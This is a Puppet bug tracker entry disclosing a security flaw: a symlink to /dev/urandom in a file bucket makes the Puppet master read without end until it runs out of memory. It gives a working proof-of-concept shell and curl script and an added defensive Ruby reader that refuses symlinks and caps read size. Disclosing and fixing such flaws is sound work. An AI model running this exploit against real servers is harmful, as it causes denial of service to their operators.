Issue #13553 has been updated by Andrew Parker.

Status changed from Unreviewed to Accepted
Assignee set to Andrew Parker

----------------------------------------
Bug #13553: Puppet master can be caused to read data until it is out of memory
https://projects.puppetlabs.com/issues/13553#change-59027

Author: Andrew Parker
Status: Accepted
Priority: High
Assignee: Andrew Parker
Category: security
Target version:
Affected Puppet version:
Keywords:
Branch:

Using the symlink attack described in Bug #13511, the puppet master can be caused to read from a stream (e.g. /dev/random) when either trying to save a file or read a file. Because of the way in which the puppet master deals with sending files on the filesystem to a remote system via a REST request, the thread handling the request will block forever reading from that stream and continually consuming more memory. This can lead to the puppet master system running out of memory and cause a denial of service.

Example exploit:

<pre>
#!/usr/bin/env sh

MD5_TO_REQUEST='d41d8cd98f00b204e9800998ecf8427e'
FILE_BUCKET_DIR="/tmp/buckets"
EXPLOIT_BUCKET="$FILE_BUCKET_DIR/d/4/1/d/8/c/d/9/$MD5_TO_REQUEST"

# Setup needed on the puppet master
mkdir -p $EXPLOIT_BUCKET
ln -sf /dev/urandom $EXPLOIT_BUCKET/contents

# performed from anywhere that has access to the keys
curl --cert ~/work/test/conf/client/ssl/certs/systems-macbook-pro.local.pem \
     --key ~/work/test/conf/client/ssl/private_keys/systems-macbook-pro.local.pem \
     --cacert ~/work/test/conf/master/ssl/ca/ca_crt.pem \
     -H 'Accept: yaml' \
     "https://localhost:8140/production/file_bucket_file/md5/$MD5_TO_REQUEST?bucket_path=$FILE_BUCKET_DIR"
</pre>

Note: this can also be done using the 'text/marshal' exploit of putting files described in Bug #13552.
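A defensive read for the failure mode reported above, added here as an illustration; it is not code from the issue or from Puppet. The names `read_bucket_contents` and `UnsafeBucketFile` and the 1 MiB cap are assumptions, and the temporary files in `demo` are constructed sample input.

```ruby
require 'tmpdir'

class UnsafeBucketFile < StandardError; end

# Assumed cap for this example; the issue does not specify one.
MAX_BUCKET_BYTES = 1024 * 1024

# Read a bucket "contents" file without following a symlink in the final
# path component and without ever buffering more than max_bytes.
def read_bucket_contents(path, max_bytes = MAX_BUCKET_BYTES)
  # NOFOLLOW: the open fails if the last path component is a symlink.
  # NONBLOCK: opening a FIFO or device cannot hang the request thread.
  File.open(path, File::RDONLY | File::NOFOLLOW | File::NONBLOCK) do |f|
    st = f.stat # fstat on the open descriptor, so no check-then-use race
    raise UnsafeBucketFile, "#{path}: not a regular file" unless st.file?
    raise UnsafeBucketFile, "#{path}: larger than #{max_bytes} bytes" if st.size > max_bytes
    # Bounded read: the file may still grow after the stat.
    data = f.read(max_bytes + 1) || ''
    raise UnsafeBucketFile, "#{path}: larger than #{max_bytes} bytes" if data.bytesize > max_bytes
    data
  end
rescue Errno::ELOOP, Errno::EMLINK
  raise UnsafeBucketFile, "#{path}: symbolic link refused"
end

# Constructed sample layout: one regular file and one link to a stream.
def demo
  Dir.mktmpdir do |dir|
    good = File.join(dir, 'contents')
    link = File.join(dir, 'linked')
    File.write(good, 'hello')
    File.symlink('/dev/urandom', link)
    [good, link].map do |p|
      begin
        read_bucket_contents(p)
      rescue UnsafeBucketFile => e
        e.class
      end
    end
  end
end

p demo if __FILE__ == $0
```

`O_NOFOLLOW` only covers the last path component, so a symlinked parent directory still needs a separate check on the bucket path itself.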
